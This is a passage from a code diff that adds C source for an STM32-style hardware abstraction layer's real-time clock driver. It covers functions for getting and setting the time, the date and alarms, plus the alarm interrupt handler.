HAL_RTC_DST_xxx functions */ + hrtc->Instance->CR |= (uint32_t)(sTime->DayLightSaving | sTime->StoreOperation); + + /* Exit Initialization mode */ + hrtc->Instance->ISR &= (uint32_t)~RTC_ISR_INIT; + + /* If CR_BYPSHAD bit = 0, wait for synchro else this check is not needed */ + if((hrtc->Instance->CR & RTC_CR_BYPSHAD) == RESET) + { + if(HAL_RTC_WaitForSynchro(hrtc) != HAL_OK) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_ERROR; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_ERROR; + } + } + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_READY; + + __HAL_UNLOCK(hrtc); + + return HAL_OK; + } +} + +/** + * @brief Gets RTC current time. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param sTime Pointer to Time structure + * @param Format Specifies the format of the entered parameters. + * This parameter can be one of the following values: + * @arg RTC_FORMAT_BIN: Binary data format + * @arg RTC_FORMAT_BCD: BCD data format + * @note You can use SubSeconds and SecondFraction (sTime structure fields returned) to convert SubSeconds + * value in second fraction ratio with time unit following generic formula: + * Second fraction ratio * time_unit= [(SecondFraction-SubSeconds)/(SecondFraction+1)] * time_unit + * This conversion can be performed only if no shift operation is pending (ie. SHFP=0) when PREDIV_S >= SS + * @note You must call HAL_RTC_GetDate() after HAL_RTC_GetTime() to unlock the values + * in the higher-order calendar shadow registers to ensure consistency between the time and date values. + * Reading RTC current time locks the values in calendar shadow registers until current date is read. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTC_GetTime(RTC_HandleTypeDef *hrtc, RTC_TimeTypeDef *sTime, uint32_t Format) +{ + uint32_t tmpreg = 0U; + + /* Check the parameters */ + assert_param(IS_RTC_FORMAT(Format)); + + /* Get subseconds structure field from the corresponding register */ + sTime->SubSeconds = (uint32_t)(hrtc->Instance->SSR); + + /* Get SecondFraction structure field from the corresponding register field*/ + sTime->SecondFraction = (uint32_t)(hrtc->Instance->PRER & RTC_PRER_PREDIV_S); + + /* Get the TR register */ + tmpreg = (uint32_t)(hrtc->Instance->TR & RTC_TR_RESERVED_MASK); + + /* Fill the structure fields with the read parameters */ + sTime->Hours = (uint8_t)((tmpreg & (RTC_TR_HT | RTC_TR_HU)) >> 16U); + sTime->Minutes = (uint8_t)((tmpreg & (RTC_TR_MNT | RTC_TR_MNU)) >> 8U); + sTime->Seconds = (uint8_t)(tmpreg & (RTC_TR_ST | RTC_TR_SU)); + sTime->TimeFormat = (uint8_t)((tmpreg & (RTC_TR_PM)) >> 16U); + + /* Check the input parameters format */ + if(Format == RTC_FORMAT_BIN) + { + /* Convert the time structure parameters to Binary format */ + sTime->Hours = (uint8_t)RTC_Bcd2ToByte(sTime->Hours); + sTime->Minutes = (uint8_t)RTC_Bcd2ToByte(sTime->Minutes); + sTime->Seconds = (uint8_t)RTC_Bcd2ToByte(sTime->Seconds); + } + + return HAL_OK; +} + +/** + * @brief Sets RTC current date. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param sDate Pointer to date structure + * @param Format specifies the format of the entered parameters. + * This parameter can be one of the following values: + * @arg RTC_FORMAT_BIN: Binary data format + * @arg RTC_FORMAT_BCD: BCD data format + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTC_SetDate(RTC_HandleTypeDef *hrtc, RTC_DateTypeDef *sDate, uint32_t Format) +{ + uint32_t datetmpreg = 0U; + + /* Check the parameters */ + assert_param(IS_RTC_FORMAT(Format)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + if((Format == RTC_FORMAT_BIN) && ((sDate->Month & 0x10U) == 0x10U)) + { + sDate->Month = (uint8_t)((sDate->Month & (uint8_t)~(0x10U)) + (uint8_t)0x0AU); + } + + assert_param(IS_RTC_WEEKDAY(sDate->WeekDay)); + + if(Format == RTC_FORMAT_BIN) + { + assert_param(IS_RTC_YEAR(sDate->Year)); + assert_param(IS_RTC_MONTH(sDate->Month)); + assert_param(IS_RTC_DATE(sDate->Date)); + + datetmpreg = (((uint32_t)RTC_ByteToBcd2(sDate->Year) << 16U) | \ + ((uint32_t)RTC_ByteToBcd2(sDate->Month) << 8U) | \ + ((uint32_t)RTC_ByteToBcd2(sDate->Date)) | \ + ((uint32_t)sDate->WeekDay << 13U)); + } + else + { + assert_param(IS_RTC_YEAR(RTC_Bcd2ToByte(sDate->Year))); + assert_param(IS_RTC_MONTH(RTC_Bcd2ToByte(sDate->Month))); + assert_param(IS_RTC_DATE(RTC_Bcd2ToByte(sDate->Date))); + + datetmpreg = ((((uint32_t)sDate->Year) << 16U) | \ + (((uint32_t)sDate->Month) << 8U) | \ + ((uint32_t)sDate->Date) | \ + (((uint32_t)sDate->WeekDay) << 13U)); + } + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Set Initialization mode */ + if(RTC_EnterInitMode(hrtc) != HAL_OK) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Set RTC state*/ + hrtc->State = HAL_RTC_STATE_ERROR; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_ERROR; + } + else + { + /* Set the RTC_DR register */ + hrtc->Instance->DR = (uint32_t)(datetmpreg & RTC_DR_RESERVED_MASK); + + /* Exit Initialization mode */ + hrtc->Instance->ISR &= (uint32_t)~RTC_ISR_INIT; + + /* If CR_BYPSHAD bit = 0, wait for synchro else this check is not needed */ + if((hrtc->Instance->CR & RTC_CR_BYPSHAD) == RESET) + { + if(HAL_RTC_WaitForSynchro(hrtc) != HAL_OK) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_ERROR; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_ERROR; + } + } + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_READY ; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; + } +} + +/** + * @brief Gets RTC current date. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param sDate Pointer to Date structure + * @param Format Specifies the format of the entered parameters. + * This parameter can be one of the following values: + * @arg RTC_FORMAT_BIN: Binary data format + * @arg RTC_FORMAT_BCD: BCD data format + * @note You must call HAL_RTC_GetDate() after HAL_RTC_GetTime() to unlock the values + * in the higher-order calendar shadow registers to ensure consistency between the time and date values. + * Reading RTC current time locks the values in calendar shadow registers until Current date is read. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTC_GetDate(RTC_HandleTypeDef *hrtc, RTC_DateTypeDef *sDate, uint32_t Format) +{ + uint32_t datetmpreg = 0U; + + /* Check the parameters */ + assert_param(IS_RTC_FORMAT(Format)); + + /* Get the DR register */ + datetmpreg = (uint32_t)(hrtc->Instance->DR & RTC_DR_RESERVED_MASK); + + /* Fill the structure fields with the read parameters */ + sDate->Year = (uint8_t)((datetmpreg & (RTC_DR_YT | RTC_DR_YU)) >> 16U); + sDate->Month = (uint8_t)((datetmpreg & (RTC_DR_MT | RTC_DR_MU)) >> 8U); + sDate->Date = (uint8_t)(datetmpreg & (RTC_DR_DT | RTC_DR_DU)); + sDate->WeekDay = (uint8_t)((datetmpreg & (RTC_DR_WDU)) >> 13U); + + /* Check the input parameters format */ + if(Format == RTC_FORMAT_BIN) + { + /* Convert the date structure parameters to Binary format */ + sDate->Year = (uint8_t)RTC_Bcd2ToByte(sDate->Year); + sDate->Month = (uint8_t)RTC_Bcd2ToByte(sDate->Month); + sDate->Date = (uint8_t)RTC_Bcd2ToByte(sDate->Date); + } + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup RTC_Exported_Functions_Group3 RTC Alarm functions + * @brief RTC Alarm functions + * +@verbatim + =============================================================================== + ##### RTC Alarm functions ##### + =============================================================================== + + [..] This section provides functions allowing to configure Alarm feature + +@endverbatim + * @{ + */ +/** + * @brief Sets the specified RTC Alarm. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param sAlarm Pointer to Alarm structure + * @param Format Specifies the format of the entered parameters. + * This parameter can be one of the following values: + * @arg RTC_FORMAT_BIN: Binary data format + * @arg RTC_FORMAT_BCD: BCD data format + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTC_SetAlarm(RTC_HandleTypeDef *hrtc, RTC_AlarmTypeDef *sAlarm, uint32_t Format) +{ + uint32_t tickstart = 0U; + uint32_t tmpreg = 0U, subsecondtmpreg = 0U; + + /* Check the parameters */ + assert_param(IS_RTC_FORMAT(Format)); + assert_param(IS_RTC_ALARM(sAlarm->Alarm)); + assert_param(IS_RTC_ALARM_MASK(sAlarm->AlarmMask)); + assert_param(IS_RTC_ALARM_DATE_WEEKDAY_SEL(sAlarm->AlarmDateWeekDaySel)); + assert_param(IS_RTC_ALARM_SUB_SECOND_VALUE(sAlarm->AlarmTime.SubSeconds)); + assert_param(IS_RTC_ALARM_SUB_SECOND_MASK(sAlarm->AlarmSubSecondMask)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + if(Format == RTC_FORMAT_BIN) + { + if((hrtc->Instance->CR & RTC_CR_FMT) != (uint32_t)RESET) + { + assert_param(IS_RTC_HOUR12(sAlarm->AlarmTime.Hours)); + assert_param(IS_RTC_HOURFORMAT12(sAlarm->AlarmTime.TimeFormat)); + } + else + { + sAlarm->AlarmTime.TimeFormat = 0x00U; + assert_param(IS_RTC_HOUR24(sAlarm->AlarmTime.Hours)); + } + assert_param(IS_RTC_MINUTES(sAlarm->AlarmTime.Minutes)); + assert_param(IS_RTC_SECONDS(sAlarm->AlarmTime.Seconds)); + + if(sAlarm->AlarmDateWeekDaySel == RTC_ALARMDATEWEEKDAYSEL_DATE) + { + assert_param(IS_RTC_ALARM_DATE_WEEKDAY_DATE(sAlarm->AlarmDateWeekDay)); + } + else + { + assert_param(IS_RTC_ALARM_DATE_WEEKDAY_WEEKDAY(sAlarm->AlarmDateWeekDay)); + } + + tmpreg = (((uint32_t)RTC_ByteToBcd2(sAlarm->AlarmTime.Hours) << 16U) | \ + ((uint32_t)RTC_ByteToBcd2(sAlarm->AlarmTime.Minutes) << 8U) | \ + ((uint32_t)RTC_ByteToBcd2(sAlarm->AlarmTime.Seconds)) | \ + ((uint32_t)(sAlarm->AlarmTime.TimeFormat) << 16U) | \ + ((uint32_t)RTC_ByteToBcd2(sAlarm->AlarmDateWeekDay) << 24U) | \ + ((uint32_t)sAlarm->AlarmDateWeekDaySel) | \ + ((uint32_t)sAlarm->AlarmMask)); + } + else + { + if((hrtc->Instance->CR & RTC_CR_FMT) != (uint32_t)RESET) + { + assert_param(IS_RTC_HOUR12(RTC_Bcd2ToByte(sAlarm->AlarmTime.Hours))); + assert_param(IS_RTC_HOURFORMAT12(sAlarm->AlarmTime.TimeFormat)); + } + else + { + sAlarm->AlarmTime.TimeFormat = 0x00U; + assert_param(IS_RTC_HOUR24(RTC_Bcd2ToByte(sAlarm->AlarmTime.Hours))); + } + + assert_param(IS_RTC_MINUTES(RTC_Bcd2ToByte(sAlarm->AlarmTime.Minutes))); + assert_param(IS_RTC_SECONDS(RTC_Bcd2ToByte(sAlarm->AlarmTime.Seconds))); + + if(sAlarm->AlarmDateWeekDaySel == RTC_ALARMDATEWEEKDAYSEL_DATE) + { + assert_param(IS_RTC_ALARM_DATE_WEEKDAY_DATE(RTC_Bcd2ToByte(sAlarm->AlarmDateWeekDay))); + } + else + { + assert_param(IS_RTC_ALARM_DATE_WEEKDAY_WEEKDAY(RTC_Bcd2ToByte(sAlarm->AlarmDateWeekDay))); + } + + tmpreg = (((uint32_t)(sAlarm->AlarmTime.Hours) << 16U) | \ + ((uint32_t)(sAlarm->AlarmTime.Minutes) << 8U) | \ + ((uint32_t) sAlarm->AlarmTime.Seconds) | \ + ((uint32_t)(sAlarm->AlarmTime.TimeFormat) << 16U) | \ + ((uint32_t)(sAlarm->AlarmDateWeekDay) << 24U) | \ + ((uint32_t)sAlarm->AlarmDateWeekDaySel) | \ + ((uint32_t)sAlarm->AlarmMask)); + } + + /* Configure the Alarm A or Alarm B Sub Second registers */ + subsecondtmpreg = (uint32_t)((uint32_t)(sAlarm->AlarmTime.SubSeconds) | (uint32_t)(sAlarm->AlarmSubSecondMask)); + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Configure the Alarm register */ + if(sAlarm->Alarm == RTC_ALARM_A) + { + /* Disable the Alarm A interrupt */ + __HAL_RTC_ALARMA_DISABLE(hrtc); + + /* In case of interrupt mode is used, the interrupt source must disabled */ + __HAL_RTC_ALARM_DISABLE_IT(hrtc, RTC_IT_ALRA); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait till RTC ALRAWF flag is set and if Time out is reached exit */ + while(__HAL_RTC_ALARM_GET_FLAG(hrtc, RTC_FLAG_ALRAWF) == RESET) + { + if((HAL_GetTick() - tickstart ) > RTC_TIMEOUT_VALUE) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_TIMEOUT; + } + } + + hrtc->Instance->ALRMAR = (uint32_t)tmpreg; + /* Configure the Alarm A Sub Second register */ + hrtc->Instance->ALRMASSR = subsecondtmpreg; + /* Configure the Alarm state: Enable Alarm */ + __HAL_RTC_ALARMA_ENABLE(hrtc); + } + else + { + /* Disable the Alarm B interrupt */ + __HAL_RTC_ALARMB_DISABLE(hrtc); + + /* In case of interrupt mode is used, the interrupt source must disabled */ + __HAL_RTC_ALARM_DISABLE_IT(hrtc, RTC_IT_ALRB); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait till RTC ALRBWF flag is set and if Time out is reached exit */ + while(__HAL_RTC_ALARM_GET_FLAG(hrtc, RTC_FLAG_ALRBWF) == RESET) + { + if((HAL_GetTick() - tickstart ) > RTC_TIMEOUT_VALUE) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_TIMEOUT; + } + } + + hrtc->Instance->ALRMBR = (uint32_t)tmpreg; + /* Configure the Alarm B Sub Second register */ + hrtc->Instance->ALRMBSSR = subsecondtmpreg; + /* Configure the Alarm state: Enable Alarm */ + __HAL_RTC_ALARMB_ENABLE(hrtc); + } + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Sets the specified RTC Alarm with Interrupt + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param sAlarm Pointer to Alarm structure + * @param Format Specifies the format of the entered parameters. + * This parameter can be one of the following values: + * @arg RTC_FORMAT_BIN: Binary data format + * @arg RTC_FORMAT_BCD: BCD data format + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTC_SetAlarm_IT(RTC_HandleTypeDef *hrtc, RTC_AlarmTypeDef *sAlarm, uint32_t Format) +{ + uint32_t tmpreg = 0U, subsecondtmpreg = 0U; + __IO uint32_t count = RTC_TIMEOUT_VALUE * (SystemCoreClock / 32U / 1000U) ; + + /* Check the parameters */ + assert_param(IS_RTC_FORMAT(Format)); + assert_param(IS_RTC_ALARM(sAlarm->Alarm)); + assert_param(IS_RTC_ALARM_MASK(sAlarm->AlarmMask)); + assert_param(IS_RTC_ALARM_DATE_WEEKDAY_SEL(sAlarm->AlarmDateWeekDaySel)); + assert_param(IS_RTC_ALARM_SUB_SECOND_VALUE(sAlarm->AlarmTime.SubSeconds)); + assert_param(IS_RTC_ALARM_SUB_SECOND_MASK(sAlarm->AlarmSubSecondMask)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + if(Format == RTC_FORMAT_BIN) + { + if((hrtc->Instance->CR & RTC_CR_FMT) != (uint32_t)RESET) + { + assert_param(IS_RTC_HOUR12(sAlarm->AlarmTime.Hours)); + assert_param(IS_RTC_HOURFORMAT12(sAlarm->AlarmTime.TimeFormat)); + } + else + { + sAlarm->AlarmTime.TimeFormat = 0x00U; + assert_param(IS_RTC_HOUR24(sAlarm->AlarmTime.Hours)); + } + assert_param(IS_RTC_MINUTES(sAlarm->AlarmTime.Minutes)); + assert_param(IS_RTC_SECONDS(sAlarm->AlarmTime.Seconds)); + + if(sAlarm->AlarmDateWeekDaySel == RTC_ALARMDATEWEEKDAYSEL_DATE) + { + assert_param(IS_RTC_ALARM_DATE_WEEKDAY_DATE(sAlarm->AlarmDateWeekDay)); + } + else + { + assert_param(IS_RTC_ALARM_DATE_WEEKDAY_WEEKDAY(sAlarm->AlarmDateWeekDay)); + } + tmpreg = (((uint32_t)RTC_ByteToBcd2(sAlarm->AlarmTime.Hours) << 16U) | \ + ((uint32_t)RTC_ByteToBcd2(sAlarm->AlarmTime.Minutes) << 8U) | \ + ((uint32_t)RTC_ByteToBcd2(sAlarm->AlarmTime.Seconds)) | \ + ((uint32_t)(sAlarm->AlarmTime.TimeFormat) << 16U) | \ + ((uint32_t)RTC_ByteToBcd2(sAlarm->AlarmDateWeekDay) << 24U) | \ + ((uint32_t)sAlarm->AlarmDateWeekDaySel) | \ + ((uint32_t)sAlarm->AlarmMask)); + } + else + { + if((hrtc->Instance->CR & RTC_CR_FMT) != (uint32_t)RESET) + { + assert_param(IS_RTC_HOUR12(RTC_Bcd2ToByte(sAlarm->AlarmTime.Hours))); + assert_param(IS_RTC_HOURFORMAT12(sAlarm->AlarmTime.TimeFormat)); + } + else + { + sAlarm->AlarmTime.TimeFormat = 0x00U; + assert_param(IS_RTC_HOUR24(RTC_Bcd2ToByte(sAlarm->AlarmTime.Hours))); + } + + assert_param(IS_RTC_MINUTES(RTC_Bcd2ToByte(sAlarm->AlarmTime.Minutes))); + assert_param(IS_RTC_SECONDS(RTC_Bcd2ToByte(sAlarm->AlarmTime.Seconds))); + + if(sAlarm->AlarmDateWeekDaySel == RTC_ALARMDATEWEEKDAYSEL_DATE) + { + assert_param(IS_RTC_ALARM_DATE_WEEKDAY_DATE(RTC_Bcd2ToByte(sAlarm->AlarmDateWeekDay))); + } + else + { + assert_param(IS_RTC_ALARM_DATE_WEEKDAY_WEEKDAY(RTC_Bcd2ToByte(sAlarm->AlarmDateWeekDay))); + } + tmpreg = (((uint32_t)(sAlarm->AlarmTime.Hours) << 16U) | \ + ((uint32_t)(sAlarm->AlarmTime.Minutes) << 8U) | \ + ((uint32_t) sAlarm->AlarmTime.Seconds) | \ + ((uint32_t)(sAlarm->AlarmTime.TimeFormat) << 16U) | \ + ((uint32_t)(sAlarm->AlarmDateWeekDay) << 24U) | \ + ((uint32_t)sAlarm->AlarmDateWeekDaySel) | \ + ((uint32_t)sAlarm->AlarmMask)); + } + /* Configure the Alarm A or Alarm B Sub Second registers */ + subsecondtmpreg = (uint32_t)((uint32_t)(sAlarm->AlarmTime.SubSeconds) | (uint32_t)(sAlarm->AlarmSubSecondMask)); + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + /* Configure the Alarm register */ + if(sAlarm->Alarm == RTC_ALARM_A) + { + /* Disable the Alarm A interrupt */ + __HAL_RTC_ALARMA_DISABLE(hrtc); + + /* Clear flag alarm A */ + __HAL_RTC_ALARM_CLEAR_FLAG(hrtc, RTC_FLAG_ALRAF); + + /* Wait till RTC ALRAWF flag is set and if Time out is reached exit */ + do + { + if (count-- == 0U) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_TIMEOUT; + } + } + while (__HAL_RTC_ALARM_GET_FLAG(hrtc, RTC_FLAG_ALRAWF) == RESET); + + hrtc->Instance->ALRMAR = (uint32_t)tmpreg; + /* Configure the Alarm A Sub Second register */ + hrtc->Instance->ALRMASSR = subsecondtmpreg; + /* Configure the Alarm state: Enable Alarm */ + __HAL_RTC_ALARMA_ENABLE(hrtc); + /* Configure the Alarm interrupt */ + __HAL_RTC_ALARM_ENABLE_IT(hrtc,RTC_IT_ALRA); + } + else + { + /* Disable the Alarm B interrupt */ + __HAL_RTC_ALARMB_DISABLE(hrtc); + + /* Clear flag alarm B */ + __HAL_RTC_ALARM_CLEAR_FLAG(hrtc, RTC_FLAG_ALRBF); + + /* Wait till RTC ALRBWF flag is set and if Time out is reached exit */ + do + { + if (count-- == 0U) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_TIMEOUT; + } + } + while (__HAL_RTC_ALARM_GET_FLAG(hrtc, RTC_FLAG_ALRBWF) == RESET); + + hrtc->Instance->ALRMBR = (uint32_t)tmpreg; + /* Configure the Alarm B Sub Second register */ + hrtc->Instance->ALRMBSSR = subsecondtmpreg; + /* Configure the Alarm state: Enable Alarm */ + __HAL_RTC_ALARMB_ENABLE(hrtc); + /* Configure the Alarm interrupt */ + __HAL_RTC_ALARM_ENABLE_IT(hrtc, RTC_IT_ALRB); + } + + /* RTC Alarm Interrupt Configuration: EXTI configuration */ + __HAL_RTC_ALARM_EXTI_ENABLE_IT(); + + EXTI->RTSR |= RTC_EXTI_LINE_ALARM_EVENT; + + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Deactivate the specified RTC Alarm + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param Alarm Specifies the Alarm. + * This parameter can be one of the following values: + * @arg RTC_ALARM_A: AlarmA + * @arg RTC_ALARM_B: AlarmB + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTC_DeactivateAlarm(RTC_HandleTypeDef *hrtc, uint32_t Alarm) +{ + uint32_t tickstart = 0U; + + /* Check the parameters */ + assert_param(IS_RTC_ALARM(Alarm)); + + /* Process Locked */ + __HAL_LOCK(hrtc); + + hrtc->State = HAL_RTC_STATE_BUSY; + + /* Disable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_DISABLE(hrtc); + + if(Alarm == RTC_ALARM_A) + { + /* AlarmA */ + __HAL_RTC_ALARMA_DISABLE(hrtc); + + /* In case of interrupt mode is used, the interrupt source must disabled */ + __HAL_RTC_ALARM_DISABLE_IT(hrtc, RTC_IT_ALRA); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait till RTC ALRxWF flag is set and if Time out is reached exit */ + while(__HAL_RTC_ALARM_GET_FLAG(hrtc, RTC_FLAG_ALRAWF) == RESET) + { + if((HAL_GetTick() - tickstart ) > RTC_TIMEOUT_VALUE) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_TIMEOUT; + } + } + } + else + { + /* AlarmB */ + __HAL_RTC_ALARMB_DISABLE(hrtc); + + /* In case of interrupt mode is used, the interrupt source must disabled */ + __HAL_RTC_ALARM_DISABLE_IT(hrtc,RTC_IT_ALRB); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait till RTC ALRxWF flag is set and if Time out is reached exit */ + while(__HAL_RTC_ALARM_GET_FLAG(hrtc, RTC_FLAG_ALRBWF) == RESET) + { + if((HAL_GetTick() - tickstart ) > RTC_TIMEOUT_VALUE) + { + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_TIMEOUT; + } + } + } + /* Enable the write protection for RTC registers */ + __HAL_RTC_WRITEPROTECTION_ENABLE(hrtc); + + hrtc->State = HAL_RTC_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hrtc); + + return HAL_OK; +} + +/** + * @brief Gets the RTC Alarm value and masks. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @param sAlarm Pointer to Date structure + * @param Alarm Specifies the Alarm. + * This parameter can be one of the following values: + * @arg RTC_ALARM_A: AlarmA + * @arg RTC_ALARM_B: AlarmB + * @param Format Specifies the format of the entered parameters. + * This parameter can be one of the following values: + * @arg RTC_FORMAT_BIN: Binary data format + * @arg RTC_FORMAT_BCD: BCD data format + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RTC_GetAlarm(RTC_HandleTypeDef *hrtc, RTC_AlarmTypeDef *sAlarm, uint32_t Alarm, uint32_t Format) +{ + uint32_t tmpreg = 0U, subsecondtmpreg = 0U; + + /* Check the parameters */ + assert_param(IS_RTC_FORMAT(Format)); + assert_param(IS_RTC_ALARM(Alarm)); + + if(Alarm == RTC_ALARM_A) + { + /* AlarmA */ + sAlarm->Alarm = RTC_ALARM_A; + + tmpreg = (uint32_t)(hrtc->Instance->ALRMAR); + subsecondtmpreg = (uint32_t)((hrtc->Instance->ALRMASSR ) & RTC_ALRMASSR_SS); + } + else + { + sAlarm->Alarm = RTC_ALARM_B; + + tmpreg = (uint32_t)(hrtc->Instance->ALRMBR); + subsecondtmpreg = (uint32_t)((hrtc->Instance->ALRMBSSR) & RTC_ALRMBSSR_SS); + } + + /* Fill the structure with the read parameters */ + sAlarm->AlarmTime.Hours = (uint32_t)((tmpreg & (RTC_ALRMAR_HT | RTC_ALRMAR_HU)) >> 16U); + sAlarm->AlarmTime.Minutes = (uint32_t)((tmpreg & (RTC_ALRMAR_MNT | RTC_ALRMAR_MNU)) >> 8U); + sAlarm->AlarmTime.Seconds = (uint32_t)(tmpreg & (RTC_ALRMAR_ST | RTC_ALRMAR_SU)); + sAlarm->AlarmTime.TimeFormat = (uint32_t)((tmpreg & RTC_ALRMAR_PM) >> 16U); + sAlarm->AlarmTime.SubSeconds = (uint32_t) subsecondtmpreg; + sAlarm->AlarmDateWeekDay = (uint32_t)((tmpreg & (RTC_ALRMAR_DT | RTC_ALRMAR_DU)) >> 24U); + sAlarm->AlarmDateWeekDaySel = (uint32_t)(tmpreg & RTC_ALRMAR_WDSEL); + sAlarm->AlarmMask = (uint32_t)(tmpreg & RTC_ALARMMASK_ALL); + + if(Format == RTC_FORMAT_BIN) + { + sAlarm->AlarmTime.Hours = RTC_Bcd2ToByte(sAlarm->AlarmTime.Hours); + sAlarm->AlarmTime.Minutes = RTC_Bcd2ToByte(sAlarm->AlarmTime.Minutes); + sAlarm->AlarmTime.Seconds = RTC_Bcd2ToByte(sAlarm->AlarmTime.Seconds); + sAlarm->AlarmDateWeekDay = RTC_Bcd2ToByte(sAlarm->AlarmDateWeekDay); + } + + return HAL_OK; +} + +/** + * @brief This function handles Alarm interrupt request. + * @param hrtc pointer to a RTC_HandleTypeDef structure that contains + * the configuration information for RTC. + * @retval None + */ +void HAL_RTC_AlarmIRQHandler(RTC_HandleTypeDef* hrtc) +{ + /* Get the AlarmA interrupt source enable status */ + if(__HAL_RTC_ALARM_GET_IT_SOURCE(hrtc, RTC_IT_ALRA) != (uint32_t)RESET) + { + /* Get the pending status of the AlarmA Interrupt */ + if(__HAL_RTC_ALARM_GET_FLAG(hrtc, RTC_FLAG_ALRAF) != (uint32_t)RESET) + { + /* AlarmA callback */ + #if (USE_HAL_RTC_REGISTER_CALLBACKS == 1) + hrtc->AlarmAEventCallback(hrtc); + #else + HAL_RTC_AlarmAEventCallback(hrtc); + #endif /* USE_HAL_RTC_REGISTER_CALLBACKS */ + + /* Clear the AlarmA interrupt pending bit */ + __HAL_RTC_ALARM_CLEAR_FLAG(hrtc,RTC_FLAG_ALRAF); + } + } + + /* Get the AlarmB interrupt source enable status */ + if(__HAL_RTC_ALARM_GET_IT_SOURCE(hrtc, RTC_IT_ALRB) != (uint32_t)RESET) + { + /* Get the pending status of the AlarmB Interrupt */ + if(__HAL_RTC_ALARM_GET_FLAG(hrtc, RTC_FLAG_ALRBF) != (uint32_t)RESET) + { + /* AlarmB callback */ + #if (USE_HAL_RTC_REGISTER_CALLBACKS == 1) + hrtc->AlarmBEventCallback(hrtc); + #else + HAL_RTCEx_AlarmBEventCallback(hrtc); + #endif /* USE_HAL_RTC_REGISTER_CALLBACKS */ + + /* Clear the AlarmB interrupt pending bit */ + __HAL_RTC_ALARM_CLEAR_FLAG(hrtc,RTC_FLAG_ALRBF); + } + } + + /* Clear the EXTI's line Flag for RTC Alarm */ + __HAL_RTC_ALARM_EXTI_CLEAR_FLAG(); + + /* Change RTC state */ + hrtc->State = HAL_RTC_STATE_READY; +} + +/** + * @brief Alarm A callback. + * @param hrtc pointer 